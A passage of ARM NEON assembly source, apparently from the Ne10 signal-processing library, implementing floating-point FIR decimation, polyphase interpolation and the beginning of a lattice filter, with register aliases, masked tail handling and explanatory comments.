dAcc1_0 .dn D20.F32
dAcc1_1 .dn D21.F32
qAcc2 .qn Q11.F32
dAcc2_0 .dn D22.F32
dAcc2_1 .dn D23.F32
qAcc3 .qn Q12.F32
dAcc3_0 .dn D24.F32
dAcc3_1 .dn D25.F32
qMask1 .qn Q13.U32
dMask1_0 .dn D26.U32
dMask1_1 .dn D27.U32
qMaskTmp .qn Q14.U32
dMaskTmp_0 .dn D28.U32
dMaskTmp_1 .dn D29.U32
qInp2 .qn Q15.F32
dInp2_0 .dn D30.F32
dInp2_1 .dn D31.F32
@/* Unpack the instance struct; the pointer is post-incremented past each field */
LDRB decimationFact,[pStateStruct],#2
LDRH numTaps,[pStateStruct],#2
LDR pCoeffs,[pStateStruct],#4
LDR pState,[pStateStruct],#4
@//outBlockSize = blockSize / S->M
#ifdef __PIC__
@/* position-independent access of LDR pMask,=ne10_divLookUpTable */
LDR pTemp,.L_PIC1_GOT_OFFSET
LDR pMask,.L_GOT_ne10_divLookUpTable
.L_PIC1:
ADD pTemp,pTemp,pc
LDR pMask,[pTemp,pMask]
#else
LDR pMask,=ne10_divLookUpTable
#endif
SUBS mask,decimationFact,#1
ADD pMask,pMask,mask,LSL #2 @ index reciprocal table by (M - 1)
LDR mask,[pMask] @ mask = fixed-point reciprocal of M
@//MOV pX,#0
SMULWB outBlockSize,blockSize,mask @ blockSize * (1/M), high half of 32x16
CMP outBlockSize,#0
IT LT
RSBLT outBlockSize,#0 @ take absolute value of the quotient
@/* S->state buffer contains previous frame (numTaps - 1) samples */
@/* pStateCurnt points to the location where the new input data should be written */
@//pStateCurnt = S->state + (numTaps - 1u)@
@/* Copy Blocksize number of new input samples into the state buffer */
#ifdef __PIC__
@/* position-independent access of LDR pMask,=ne10_qMaskTable32 */
LDR pTemp,.L_PIC2_GOT_OFFSET
LDR pMask,.L_GOT_ne10_qMaskTable32
.L_PIC2:
ADD pTemp,pTemp,pc
LDR pMask,[pTemp,pMask]
#else
LDR pMask,=ne10_qMaskTable32
#endif
SUB tapCnt,numTaps,#1
AND mask,blockSize,#3 @ blockSize % 4
ADD pB,pState,tapCnt,LSL #2 @ pB = write point for new samples
ADD mask,pMask,mask,LSL #4 @ mask-table entries are 16 bytes
VLD1 {dTemp_0,dTemp_1},[pSrc]!
VLD1 {dMask1_0,dMask1_1},[mask]
SUBS Count,blockSize,#4
LSL Offset,decimationFact, #2 @ byte stride between decimated windows
VMOV qMask,qMask1
BLT firDecimateEndCopy
firDecimateCopyLoop:
VST1 {dTemp_0,dTemp_1},[pB]!
SUBS Count,#4
VLD1 {dTemp_0,dTemp_1},[pSrc]!
BGE firDecimateCopyLoop
firDecimateEndCopy:
@/* Masked store of the final blockSize%4 input samples */
VLD1 {dCoeff_0,dCoeff_1},[pB]
VBSL qMask,qTemp,qCoeff
VST1 {dMask_0,dMask_1},[pB]
ADD pB,pB,tapCnt,LSL #2
@// Load Mask Value
AND blkCnt,outBlockSize,#3
ADD blkCnt,pMask,blkCnt,LSL #4
VLD1 {dMask1_0,dMask1_1},[blkCnt] @ lane mask for the outBlockSize tail
@/*Load Mask Table Values*/
AND tapCnt,numTaps,#3
ADD pTemp,pMask,tapCnt,LSL #4
VEOR qZero,qZero,qZero
VLD1 {dMaskTmp_0,dMaskTmp_1},[pTemp] @ lane mask for the tap tail
@/*Handle 4 output samples at a time */
SUBS blkCnt,outBlockSize,#4
BLT firDecimateEndOuterLoop
@//blkCnt = outBlockSize>>2@
firDecimateOuterLoop:
@/* Set accumulator to zero */
VEOR qAcc0,qAcc0,qAcc0
VEOR qAcc1,qAcc1,qAcc1
VEOR qAcc2,qAcc2,qAcc2
VEOR qAcc3,qAcc3,qAcc3
@/* Initialize state pointer */
MOV pX,pState
@/* Initialize coeff pointer */
MOV pB,pCoeffs
SUBS tapCnt,numTaps,#4
@/* Four input windows, each M samples apart, processed in parallel */
VLD1 {dCoeff_0,dCoeff_1},[pB]!
VLD1 {dInp0_0,dInp0_1},[pX],Offset
VLD1 {dInp1_0,dInp1_1},[pX],Offset
VLD1 {dInp2_0,dInp2_1},[pX],Offset
VLD1 {dInp3_0,dInp3_1},[pX],Offset
SUB pX,pX,Offset, LSL #2 @ rewind the 4*M-sample advance ...
ADD pX,pX,#16 @ ... then step to the next 4 taps
BLT firDecimateEndInnerLoop
firDecimateInnerLoop:
VMLA qAcc0,qCoeff,qInp0
VMLA qAcc1,qCoeff,qInp1
VMLA qAcc2,qCoeff,qInp2
VMLA qAcc3,qCoeff,qInp3
VLD1 {dCoeff_0,dCoeff_1},[pB]!
VLD1 {dInp0_0,dInp0_1},[pX],Offset
VLD1 {dInp1_0,dInp1_1},[pX],Offset
VLD1 {dInp2_0,dInp2_1},[pX],Offset
VLD1 {dInp3_0,dInp3_1},[pX],Offset
SUB pX,pX,Offset, LSL #2
ADD pX,pX,#16
SUBS tapCnt,#4
BGE firDecimateInnerLoop
firDecimateEndInnerLoop:
@/* If the filter length is not a multiple of 4, compute the remaining filter taps */
VMOV qMask,qMaskTmp
VBSL qMask,qCoeff,qZero @ zero coeff lanes beyond numTaps%4
VMLA qAcc0,qMaskF32,qInp0
VMLA qAcc1,qMaskF32,qInp1
VMLA qAcc2,qMaskF32,qInp2
VMLA qAcc3,qMaskF32,qInp3
@/* Horizontal reduction of the four accumulators into one q register */
VADD dAcc0_0,dAcc0_0,dAcc0_1
VADD dAcc1_0,dAcc1_0,dAcc1_1
VADD dAcc2_0,dAcc2_0,dAcc2_1
VADD dAcc3_0,dAcc3_0,dAcc3_1
VPADD dAcc0_0,dAcc0_0,dAcc1_0
VPADD dAcc0_1,dAcc2_0,dAcc3_0
ADD pState,pState,Offset,LSL #2 @ advance state by 4*M samples
VST1 {dAcc0_0,dAcc0_1},[pDst]!
SUBS blkCnt,#4
BGE firDecimateOuterLoop
firDecimateEndOuterLoop:
@/*Handle BlockSize Not a Multiple of 4*/
ADDS blkCnt,#4
BEQ firDecimateCopyData
@/* Set accumulator to zero */
VEOR qAcc0,qAcc0,qAcc0
VEOR qAcc1,qAcc1,qAcc1
VEOR qAcc2,qAcc2,qAcc2
VEOR qAcc3,qAcc3,qAcc3
@/* Initialize state pointer */
MOV pX,pState
@/* Initialize coeff pointer */
MOV pB,pCoeffs
SUBS tapCnt,numTaps,#4
VLD1 {dCoeff_0,dCoeff_1},[pB]!
VLD1 {dInp0_0,dInp0_1},[pX],Offset
VLD1 {dInp1_0,dInp1_1},[pX],Offset
VLD1 {dInp2_0,dInp2_1},[pX],Offset
VLD1 {dInp3_0,dInp3_1},[pX],Offset
SUB pX,pX,Offset, LSL #2
ADD pX,pX,#16
BLT firDecimateEndInnerLoop1
firDecimateInnerLoop1:
VMLA qAcc0,qCoeff,qInp0
VMLA qAcc1,qCoeff,qInp1
VMLA qAcc2,qCoeff,qInp2
VMLA qAcc3,qCoeff,qInp3
VLD1 {dCoeff_0,dCoeff_1},[pB]!
VLD1 {dInp0_0,dInp0_1},[pX],Offset
VLD1 {dInp1_0,dInp1_1},[pX],Offset
VLD1 {dInp2_0,dInp2_1},[pX],Offset
VLD1 {dInp3_0,dInp3_1},[pX],Offset
SUB pX,pX,Offset, LSL #2
ADD pX,pX,#16
SUBS tapCnt,#4
BGE firDecimateInnerLoop1
firDecimateEndInnerLoop1:
@/* If the filter length is not a multiple of 4, compute the remaining filter taps */
VMOV qMask,qMaskTmp
VBSL qMask,qCoeff,qZero
VMLA qAcc0,qMaskF32,qInp0
VMLA qAcc1,qMaskF32,qInp1
VMLA qAcc2,qMaskF32,qInp2
VMLA qAcc3,qMaskF32,qInp3
VADD dAcc0_0,dAcc0_0,dAcc0_1
VADD dAcc1_0,dAcc1_0,dAcc1_1
VADD dAcc2_0,dAcc2_0,dAcc2_1
VADD dAcc3_0,dAcc3_0,dAcc3_1
MUL Offset,Offset,blkCnt @ remaining advance = M * (outBlockSize%4) samples
VPADD dAcc0_0,dAcc0_0,dAcc1_0
VPADD dAcc0_1,dAcc2_0,dAcc3_0
ADD pState,pState,Offset
VMOV qMask,qMask1
VLD1 {dTemp_0,dTemp_1},[pDst]
VBSL qMask,qAcc0,qTemp @ keep only the valid tail output lanes
VST1 {dMask_0,dMask_1},[pDst]
ADD pDst,pDst,blkCnt,LSL #2
firDecimateCopyData:
@/* Processing is complete. Now shift the data in the state buffer down by
@** blockSize samples. This prepares the state buffer for the next function
@** call. */
@/* Points to the start of the state buffer */
SUB numTaps,numTaps,#1
AND mask,numTaps,#3
LDR pX,[pStateStruct,#-4] @ re-read S->state (struct base was advanced by 12)
ADD pTemp,pMask,mask,LSL #4
VLD1 {dInp0_0,dInp0_1},[pState]!
VLD1 {dMask_0,dMask_1},[pTemp]
@/* copy data */
SUBS Count,numTaps,#4
BLT firDecimateEnd
firDecimateCopyLoop1:
VST1 {dInp0_0,dInp0_1},[pX]!
SUBS Count,#4
VLD1 {dInp0_0,dInp0_1},[pState]!
BGE firDecimateCopyLoop1
firDecimateEnd:
@/* Masked store of the final (numTaps-1)%4 state samples */
VLD1 {dTemp_0,dTemp_1},[pX]
VBSL qMask,qInp0,qTemp
VST1 {dOut_0,dOut_1},[pX]
ADD pX,pX,mask, LSL #2
@// Return From Function
VPOP {d8-d9}
POP {r4-r12,pc}
@/*ARM Registers*/
.unreq pStateStruct
.unreq pSrc
.unreq pDst
.unreq blockSize
.unreq pState
.unreq pCoeffs
.unreq decimationFact
.unreq outBlockSize
.unreq pX
.unreq pB
.unreq numTaps
.unreq tapCnt
.unreq Count
.unreq pTemp
.unreq blkCnt
.unreq pMask
.unreq mask
.unreq Offset
@/*NEON variable declarations*/
.unreq qInp0
.unreq dInp0_0
.unreq dInp0_1
.unreq qCoeff
.unreq dCoeff_0
.unreq dCoeff_1
.unreq qZero
.unreq qMask
.unreq qMaskF32
.unreq dMask_0
.unreq dMask_1
.unreq dOut_0
.unreq dOut_1
.unreq qInp3
.unreq dInp3_0
.unreq dInp3_1
.unreq qAcc0
.unreq dAcc0_0
.unreq dAcc0_1
.unreq qTemp
.unreq dTemp_0
.unreq dTemp_1
.unreq qInp1
.unreq dInp1_0
.unreq dInp1_1
.unreq qAcc1
.unreq dAcc1_0
.unreq dAcc1_1
.unreq qAcc2
.unreq dAcc2_0
.unreq dAcc2_1
.unreq qAcc3
.unreq dAcc3_0
.unreq dAcc3_1
.unreq qMask1
.unreq dMask1_0
.unreq dMask1_1
.unreq qMaskTmp
.unreq dMaskTmp_0
.unreq dMaskTmp_1
.unreq qInp2
.unreq dInp2_0
.unreq dInp2_1
#endif
@/* ENABLE_NE10_FIR_DECIMATE_FLOAT_NEON */
@/**
@ * @details
@ * This function operates on floating-point data types.
@ * There are no restrictions on numTaps and blockSize.
@ *
@ * The order of the coefficients in *coeffs should be
@ * bN, bN-1, bN-2, .....b1, b0
@ *
@ * <b>Cycle Count:</b>
@ *
@ * When S->numTaps / S->L is large, you get the greatest improvement.
@ *
@ * <code> C0 + C2 * blockSize + C3 * blockSize * interpolateFactor + C4 * numTaps * blockSize * interpolateFactor </code>
@ *
@ * @param[in] *S points to struct parameter
@ * @param[in] *pSrc points to the input buffer
@ * @param[out] *pDst points to the output buffer
@ * @param[in] blockSize block size of filter
@ */
#ifdef ENABLE_NE10_FIR_INTERPOLATE_FLOAT_NEON
@/*---------------------------------------------------------------------------
@ * ne10_fir_interpolate_float_neon -- polyphase FIR interpolator (factor L).
@ * AAPCS args: R0 = S (instance), R1 = pSrc, R2 = pDst, R3 = blockSize.
@ * Instance layout as read below: byte L (interpolation factor, 2-byte
@ * slot), halfword phaseLen, float *coeffs, float *state -- TODO confirm
@ * against the C struct.
@ * For each input sample, computes L outputs (4 at a time) from the
@ * polyphase coefficient banks; ne10_qMaskTable32 masks the phaseLen%4
@ * and L%4 tails.  Only caller-saved NEON registers (q0-q3, q8-q14) are
@ * used, so no VPUSH is required.
@ *-------------------------------------------------------------------------*/
.align 4
.global ne10_fir_interpolate_float_neon
.extern ne10_qMaskTable32
.thumb
.thumb_func
ne10_fir_interpolate_float_neon:
PUSH {r4-r12,lr} @push r12: to keep stack 8 bytes aligned
@/*ARM Registers*/
pStateStruct .req R0
pSrc .req R1
pDst .req R2
blockSize .req R3
pState .req R4 @/* State pointer */
pB .req R5 @/* Temporary pointers for coefficient buffer */
pCoeffs .req R5 @/* Coefficient pointer */
pStateCurnt .req R5 @/* Points to the current sample of the state */
pX .req R6 @/* Temporary pointers for state buffer */
interpolationFact .req R7
intFact .req R8
phaseLen .req R9
Offset .req R10
Count .req R11 @ /* Loop counter */
pTemp .req R11
mask .req R12
pMask .req R14 @ /* Mask Table */
index .req R14
@/*NEON variable declarations*/
qInp .qn Q0.F32
dInp_0 .dn D0.F32
dInp_1 .dn D1.F32
qCoeff0 .qn Q1.F32
dCoeff0_0 .dn D2.F32
dCoeff0_1 .dn D3.F32
qZero .qn Q2.F32
qMask .qn Q3.U32
dMask_0 .dn D6.U32
dMask_1 .dn D7.U32
dOut_0 .dn D6.F32
dOut_1 .dn D7.F32
qAcc0 .qn Q8.F32
dAcc0_0 .dn D16.F32
dAcc0_1 .dn D17.F32
qTemp .qn Q9.F32
dTemp_0 .dn D18.F32
dTemp_1 .dn D19.F32
qCoeff1 .qn Q10.F32
dCoeff1_0 .dn D20.F32
dCoeff1_1 .dn D21.F32
qCoeff2 .qn Q11.F32
dCoeff2_0 .dn D22.F32
dCoeff2_1 .dn D23.F32
qCoeff3 .qn Q12.F32
dCoeff3_0 .dn D24.F32
dCoeff3_1 .dn D25.F32
qMask1 .qn Q13.F32
dMask1_0 .dn D26.F32
dMask1_1 .dn D27.F32
qMaskTemp .qn Q14.U32
dMaskTemp_0 .dn D28.U32
dMaskTemp_1 .dn D29.U32
@/* Unpack the instance struct; the pointer is post-incremented past each field */
LDRB interpolationFact,[pStateStruct],#2
LDRH phaseLen,[pStateStruct],#2
LDR pCoeffs,[pStateStruct],#4
LDR pState,[pStateStruct],#4
LSL Offset,interpolationFact, #2 @ byte stride between polyphase coeff rows
@/* S->state buffer contains previous frame (phaseLen - 1) samples */
@/* pStateCurnt points to the location where the new input data should be written */
AND phaseLen,#3 @ phaseLen % 4 (full value is re-read from the struct later)
#ifdef __PIC__
@/* position-independent access of LDR pMask,=ne10_qMaskTable32 */
LDR pTemp,.L_PIC3_GOT_OFFSET
LDR pMask,.L_GOT_ne10_qMaskTable32
.L_PIC3:
ADD pTemp,pTemp,pc
LDR pMask,[pTemp,pMask]
#else
LDR pMask,=ne10_qMaskTable32
#endif
@/* Total number of intput samples */
@/*Load Mask Value*/
AND mask,interpolationFact,#3 @ L % 4
ADD pTemp,pMask,phaseLen,LSL #4 @ mask-table entries are 16 bytes
ADD mask,pMask,mask,LSL #4
VLD1 {dMaskTemp_0,dMaskTemp_1},[pTemp] @ lane mask for the phaseLen tail
VLD1 {dMask1_0,dMask1_1},[mask] @ lane mask for the L tail
VEOR qZero,qZero,qZero
@/* Loop over the blockSize. */
CMP blockSize,#0
BEQ firInterpolateCopyData
firInterpolateBlockLoop:
@/* Copy new input sample into the state buffer */
LDRH phaseLen,[pStateStruct,#-10] @ re-read phaseLen (struct base was advanced by 12)
LDR mask,[pSrc],#4 @ fetch one input sample (raw 32-bit move)
SUB phaseLen,#1
ADD pStateCurnt,pState,phaseLen, LSL #2
LDRB interpolationFact,[pStateStruct,#-12] @ re-read L
STR mask,[pStateCurnt] @ append the sample to the state buffer
SUBS intFact,interpolationFact,#4
MOV index,#4
BLT firInterpolateEndIntplLoop
@/* Produce 4 interpolated outputs per iteration */
firInterpolateInterpolLoop:
VEOR qAcc0,qAcc0,qAcc0
LDRH phaseLen,[pStateStruct,#-10]
LDR pCoeffs,[pStateStruct,#-8]
MOV pX,pState
SUB mask,interpolationFact,index
ADD pB,pCoeffs,mask, LSL #2 @ select the polyphase coefficient bank
@/*Load Coefficients*/
@/*c0 c1 c2 c3*/
VLD1 {dCoeff0_0,dCoeff0_1},[pB],Offset
@/*c0 c1 c2 c3*/
VLD1 {dCoeff1_0,dCoeff1_1},[pB],Offset
@/*c0 c1 c2 c3*/
VLD1 {dCoeff2_0,dCoeff2_1},[pB],Offset
@/*c0 c1 c2 c3*/
VLD1 {dCoeff3_0,dCoeff3_1},[pB],Offset
VLD1 {dInp_0,dInp_1},[pX]!
@/* Loop over the polyPhase length. Unroll by a factor of 4.
@ ** Repeat until we've computed numTaps-(4*S->L) coefficients. */
SUBS phaseLen,#4
BLT firInterpolateEndPhaseLoop
firInterpolatePhaseLoop:
@/* Perform the multiply-accumulate */
VMLA qAcc0,qCoeff0,dInp_0[0]
VMLA qAcc0,qCoeff1,dInp_0[1]
VMLA qAcc0,qCoeff2,dInp_1[0]
VMLA qAcc0,qCoeff3,dInp_1[1]
VLD1 {dInp_0,dInp_1},[pX]!
@ /*Load Coefficients*/
@/*c0 c1 c2 c3*/
VLD1 {dCoeff0_0,dCoeff0_1},[pB],Offset
@/*c0 c1 c2 c3*/
VLD1 {dCoeff1_0,dCoeff1_1},[pB],Offset
@/*c0 c1 c2 c3*/
VLD1 {dCoeff2_0,dCoeff2_1},[pB],Offset
@/*c0 c1 c2 c3*/
VLD1 {dCoeff3_0,dCoeff3_1},[pB],Offset
SUBS phaseLen,#4
BGE firInterpolatePhaseLoop
firInterpolateEndPhaseLoop:
@/* If the polyPhase length is not a multiple of 4, compute the remaining filter taps */
VMOV qMask,qMaskTemp
VBSL qMask,qInp,qZero @ zero input lanes beyond phaseLen%4 (result in dOut)
@/* Perform the multiply-accumulate */
VMLA qAcc0,qCoeff0,dOut_0[0]
VMLA qAcc0,qCoeff1,dOut_0[1]
VMLA qAcc0,qCoeff2,dOut_1[0]
VMLA qAcc0,qCoeff3,dOut_1[1]
@ /* The result is in the accumulator is in Reverse Order*/
VREV64 qAcc0,qAcc0
@/*Swap the D-Regs of Acc*/
VMOV dCoeff0_0,dAcc0_1
VMOV dCoeff0_1,dAcc0_0
VST1 {dCoeff0_0,dCoeff0_1},[pDst]!
ADD index,#4
SUBS intFact,#4
BGE firInterpolateInterpolLoop
firInterpolateEndIntplLoop:
ADDS intFact,#4 @ restore tail count (0..3 remaining outputs)
BEQ firInterpolateNextSample
@/*Handle the Remaining Samples*/
VEOR qAcc0,qAcc0,qAcc0
LDRH phaseLen,[pStateStruct,#-10]
LDR pCoeffs,[pStateStruct,#-8]
MOV pX,pState
SUB mask,interpolationFact,index
ADD pB,pCoeffs,mask, LSL #2
@/*Load Coefficients*/
@/*c0 c1 c2 c3*/
VLD1 {dCoeff0_0,dCoeff0_1},[pB],Offset
@/*c0 c1 c2 c3*/
VLD1 {dCoeff1_0,dCoeff1_1},[pB],Offset
@/*c0 c1 c2 c3*/
VLD1 {dCoeff2_0,dCoeff2_1},[pB],Offset
@/*c0 c1 c2 c3*/
VLD1 {dCoeff3_0,dCoeff3_1},[pB],Offset
VLD1 {dInp_0,dInp_1},[pX]!
@/* Loop over the polyPhase length. Unroll by a factor of 4.
@ ** Repeat until we've computed numTaps-(4*S->L) coefficients. */
SUBS phaseLen,#4
BLT firInterpolateEndPhaseLoop1
firInterpolatePhaseLoop1:
@/* Perform the multiply-accumulate */
VMLA qAcc0,qCoeff0,dInp_0[0]
VMLA qAcc0,qCoeff1,dInp_0[1]
VMLA qAcc0,qCoeff2,dInp_1[0]
VMLA qAcc0,qCoeff3,dInp_1[1]
VLD1 {dInp_0,dInp_1},[pX]!
@ /*Load Coefficients*/
@/*c0 c1 c2 c3*/
VLD1 {dCoeff0_0,dCoeff0_1},[pB],Offset
@/*c0 c1 c2 c3*/
VLD1 {dCoeff1_0,dCoeff1_1},[pB],Offset
@/*c0 c1 c2 c3*/
VLD1 {dCoeff2_0,dCoeff2_1},[pB],Offset
@/*c0 c1 c2 c3*/
VLD1 {dCoeff3_0,dCoeff3_1},[pB],Offset
SUBS phaseLen,#4
BGE firInterpolatePhaseLoop1
firInterpolateEndPhaseLoop1:
@/* If the polyPhase length is not a multiple of 4, compute the remaining filter taps */
VMOV qMask,qMaskTemp
VBSL qMask,qInp,qZero
@/* Perform the multiply-accumulate */
VMLA qAcc0,qCoeff0,dOut_0[0]
VMLA qAcc0,qCoeff1,dOut_0[1]
VMLA qAcc0,qCoeff2,dOut_1[0]
VMLA qAcc0,qCoeff3,dOut_1[1]
@ /* The result is in the accumulator is in Reverse Order*/
VREV64 qAcc0,qAcc0
VMOV qMask,qMask1
VLD1 {dTemp_0,dTemp_1},[pDst]
@/*Swap the D-Regs of Acc*/
VMOV dCoeff0_0,dAcc0_1
VMOV dCoeff0_1,dAcc0_0
VBSL qMask,qCoeff0,qTemp @ keep only L%4 valid output lanes
VST1 {dMask_0,dMask_1},[pDst]
ADD pDst,pDst,intFact, LSL #2
firInterpolateNextSample:
SUBS blockSize,#1
ADD pState,#4 @ advance the state window by one input sample
BGT firInterpolateBlockLoop
@/*End of Processing*/
firInterpolateCopyData:
@/* Save previous phaseLen - 1 samples and get rid of other samples */
@/* Points to the start of the state buffer */
LDRH phaseLen,[pStateStruct,#-10]
#ifdef __PIC__
@/* position-independent access of LDR pMask,=ne10_qMaskTable32 */
LDR pTemp,.L_PIC4_GOT_OFFSET
LDR pMask,.L_GOT_ne10_qMaskTable32
.L_PIC4:
ADD pTemp,pTemp,pc
LDR pMask,[pTemp,pMask]
#else
LDR pMask,=ne10_qMaskTable32
#endif
LDR pStateCurnt,[pStateStruct,#-4] @ re-read S->state
SUB phaseLen,phaseLen,#1
AND mask,phaseLen,#3
ADD pTemp,pMask,mask,LSL #4
VLD1 {dInp_0,dInp_1},[pState]!
VLD1 {dMask_0,dMask_1},[pTemp]
@/* copy data */
SUBS Count,phaseLen,#4
BLT firInterpolateEnd
firInterpolateCopyLoop:
VST1 {dInp_0,dInp_1},[pStateCurnt]!
SUBS Count,#4
VLD1 {dInp_0,dInp_1},[pState]!
BGE firInterpolateCopyLoop
firInterpolateEnd:
@/* Masked store of the final (phaseLen-1)%4 state samples */
VLD1 {dTemp_0,dTemp_1},[pStateCurnt]
VBSL qMask,qInp,qTemp
VST1 {dOut_0,dOut_1},[pStateCurnt]
ADD pStateCurnt,pStateCurnt,mask, LSL #2
@/*Return From Function*/
POP {r4-r12,pc}
@/*ARM Registers*/
.unreq pStateStruct
.unreq pSrc
.unreq pDst
.unreq blockSize
.unreq pState
.unreq pB
.unreq pCoeffs
.unreq pStateCurnt
.unreq pX
.unreq interpolationFact
.unreq intFact
.unreq phaseLen
.unreq Offset
.unreq Count
.unreq pTemp
.unreq mask
.unreq pMask
.unreq index
@/*NEON variable declarations*/
.unreq qInp
.unreq dInp_0
.unreq dInp_1
.unreq qCoeff0
.unreq dCoeff0_0
.unreq dCoeff0_1
.unreq qZero
.unreq qMask
.unreq dMask_0
.unreq dMask_1
.unreq dOut_0
.unreq dOut_1
.unreq qAcc0
.unreq dAcc0_0
.unreq dAcc0_1
.unreq qTemp
.unreq dTemp_0
.unreq dTemp_1
.unreq qCoeff1
.unreq dCoeff1_0
.unreq dCoeff1_1
.unreq qCoeff2
.unreq dCoeff2_0
.unreq dCoeff2_1
.unreq qCoeff3
.unreq dCoeff3_0
.unreq dCoeff3_1
.unreq qMask1
.unreq dMask1_0
.unreq dMask1_1
.unreq qMaskTemp
.unreq dMaskTemp_0
.unreq dMaskTemp_1
#endif
@/* ENABLE_NE10_FIR_INTERPOLATE_FLOAT_NEON */
@/**
@ * @details
@ * This function operates on floating-point data types.
@ * There are no restrictions on numStages and blockSize.
@ *
@ * The order of the coefficients in *coeffs should be
@ * k1, k2, ...kM-1
@ *
@ * <b>Cycle Count:</b>
@ *
@ * When the block size is >= 32 and the number of stages is small, you get
@ * the greatest improvement.
@ *
@ * <code>c0 + c1 * blockSize + c2 * numStages * blockSize</code>
@ *
@ * @param[in] *S points to struct parameter
@ * @param[in] *pSrc points to the input buffer
@ * @param[out] *pDst points to the output buffer
@ * @param[in] blockSize block size of filter
@ */
#ifdef ENABLE_NE10_FIR_LATTICE_FLOAT_NEON
.align 4
.global ne10_fir_lattice_float_neon
.extern ne10_qMaskTable32
.thumb
.thumb_func
ne10_fir_lattice_float_neon:
PUSH {r4-r12,lr} @push r12: to keep stack 8 bytes aligned
@/*ARM Registers*/
pStateStruct .req R0
pSrc .req R1
pDst .req R2
blockSize .req R3
pState .req R4 @/* State pointer */
pCoeffs .req R5 @/* Coefficient pointer */
pX .req R7 @/* Temporary pointers for state buffer */
pB .req R8 @/* Temporary pointers for coefficient buffer */
numStages .req R9 @/* Length of the filter */
stageCnt .req R10 @ /* Loop counter */
pTemp .req R11
pMask .req R14 @ /* Mask Table */
mask .req R12
@/*NEON variale Declaration*/
qFcurr .qn Q0.F32
dFcurr_0 .dn D0.F32
dFcurr_1 .dn D1.F32
qCoeff .qn Q1.F32
dCoeff_0 .dn D2.F32
dCoeff_1 .dn D3.F32
qZero .qn Q2.F32
qMask .qn Q3.U32
dMask_0 .dn D6.U32
dMask_1 .dn D7.U32
dOut_0 .dn D6.F32
dOut_1 .dn D7.F32
qAcc0 .qn Q8.F32
dAcc0_0 .dn D16.F32
dAcc0_1 .dn D17.F32
qTemp .qn Q9.F32
dTemp_0 .dn D18.F32
dTemp_1 .dn D19.F32
qFnext .qn Q10.F32
dFnext_0 .dn D20.F32
dFnext_1 .dn D21.F32
qGcurr .qn Q11.F32
dGcurr_0 .dn D22.F32
dGcurr_1 .dn D23.F32
qGnext .qn Q12.F32
dGnext_0 .dn D24.F32
dGnext_1 .dn D25.F32
qMask1 .qn Q13.U32
dMask1_0 .dn D26.U32
dMask1_1 .dn D27.U32
qMaskTmp .qn Q14.U32
dMaskTmp_0 .dn D28.U32
dMaskTmp_1 .dn D29.U32
qTemp1 .qn Q15.F32
dTemp1_0 .dn D30.F32
dTemp1_1 .dn D31.F32
fNext .dn D0.F32
gCurr .dn D1.F32
gNext .dn D2.F32
fCurr .dn D3.F32
Coeff .dn D4.F32
@/* Length of the filter */
LDRH numStages,[pStateStruct],#4
@/* State pointer */
LDR pState,[pStateStruct],#4
@/* Coefficient pointer */
LDR pCoeffs,[pStateStruct],#4
@// Get the Mask Values
#ifdef __PIC__
@/* position-independent access of LDR pMask,=ne10_qMaskTable32 */
LDR pTemp,.L_PIC5_GOT_OFFSET
LDR pMask,.L_GOT_ne10_qMaskTable32
.L_PIC5:
ADD pTemp,pTemp,pc
LDR pMask,[pTemp,pMask]
#else
LDR pMask,=ne10_qMaskTable32
#endif
SUB numStages,#1
AND mask,numStages, #3
AND stageCnt,blockSize,#3
ADD pTemp,pMask,mask,LSL #4
ADD stageCnt,pMask,stageCnt,LSL #4
VLD1 {dMaskTmp_0,dMaskTmp_1},[pTemp]
VLD1 {dMask1_0,dMask1_1},[stageCnt]
VEOR qZero,qZero,qZero
SUBS blockSize,#4
BLT firLatticeEndOuterLoop
firLatticeOuterLoop:
@/* Initialize coeff pointer */
MOV pB,pCoeffs
@/* Initialize state pointer */
MOV pX,pState
@/* Read Four samples from input buffer: fcurr0, fcurr1,fcurr2,fcurr3*/
@/* f0(n) = x(n) */
VLD1 {dFcurr_0,dFcurr_1},[pSrc]!
@/*Read one Sample from the State Buffer*/
VLD1 {dGcurr_1[1]},[pX]
VEXT qGnext,qGcurr,qFcurr,#3
VLD1 {dCoeff_0[],dCoeff_1[]},[pB]!
VMOV qFnext,qFcurr
VST1 {dFcurr_1[1]},[pX]!
@/* fi(n) = fi-1(n) + Ki * gi-1(n-1) */
@/* gi(n) = fi-1(n) * Ki + gi-1(n-1) */
@/* ki*gcurr4+fcurr4 ki*gcurr3+fcurr3 ki*gcurr2+fcurr2 ki*gcurr1+fcurr1*/
VMLA qFcurr,qGnext,qCoeff
@/* ki*fcurr4+gcurr4 ki*fcurr3+gcurr3 ki*fcurr2+gcurr2 ki*fcurr1+gcurr1*/
VMLA qGnext,qFnext,qCoeff
@/* Loop unrolling. Process 4 taps at a time . */
SUBS stageCnt,numStages,#4
BLT firLatticeEndInnerLoop
@/* Loop over the number of taps. Unroll by a factor of 4.
@ * Repeat until we've computed numStages-3 coefficients. */
@/* Process 2nd, 3rd, 4th and 5th taps ... here */
firLatticeInnerLoop:
VLD1 {dGcurr_1[1]},[pX]!
VREV64 dTemp_0,dGnext_1
VLD1 {dCoeff_0[],dCoeff_1[]},[pB]!
VEXT qGcurr,qGcurr,qGnext,#3
@ /* fi(n) = fi-1(n) + Ki * gi-1(n-1) */
@/* gi(n) = fi-1(n) * Ki + gi-1(n-1) */
@/* ki*gcurr4+fcurr4 ki*gcurr3+fcurr3 ki*gcurr2+fcurr2 ki*gcurr1+fcurr1*/
VMOV qFnext,qFcurr
VMOV qGnext,qGcurr
@/* ki*fcurr4+gcurr4 ki*fcurr3+gcurr3 ki*fcurr2+gcurr2 ki*fcurr1+gcurr1*/
VMLA qGnext,qFnext,qCoeff
VMLA qFcurr,qGcurr,qCoeff
@/*Prepare for Next Stage*/
VLD1 {dGcurr_1[1]},[pX]!
VLD1 {dCoeff_0[],dCoeff_1[]},[pB]!
VEXT dTemp_0,dGnext_1,dTemp_0,#1
VEXT qGcurr,qGcurr,qGnext,#3
@/*Next Stage*/
VMOV qFnext,qFcurr
VMOV qGnext,qGcurr
VMLA qGnext,qFnext,qCoeff
VMLA qFcurr,qGcurr,qCoeff
@/*Prepare for Next Stage*/
VLD1 {dGcurr_1[1]},[pX]!
VLD1 {dCoeff_0[],dCoeff_1[]},[pB]!
VEXT dTemp_1,dGnext_1,dTemp_1,#1
VEXT qGcurr,qGcurr,qGnext,#3
@/*Next Stage*/
VMOV qFnext,qFcurr
VMOV qGnext,qGcurr
VMLA qGnext,qFnext,qCoeff
VMLA qFcurr,qGcurr,qCoeff
@/*Prepare for Next Stage*/
VLD1 {dGcurr_1[1]},[pX]!
